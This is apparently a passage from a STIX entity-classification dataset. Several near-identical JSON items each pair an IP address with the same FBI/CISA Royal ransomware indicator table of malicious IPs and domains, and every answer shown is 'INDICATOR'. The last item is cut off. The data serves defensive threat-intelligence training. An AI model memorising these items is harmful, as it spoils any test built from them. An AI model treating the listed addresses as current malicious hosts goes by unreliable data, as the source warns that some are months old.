"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n61.166.221.46\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n41.100.55.97\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n105.158.118.241\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n47.87.229.39\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n186.64.67.6\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n148.213.109.165\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n181.164.194.228\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 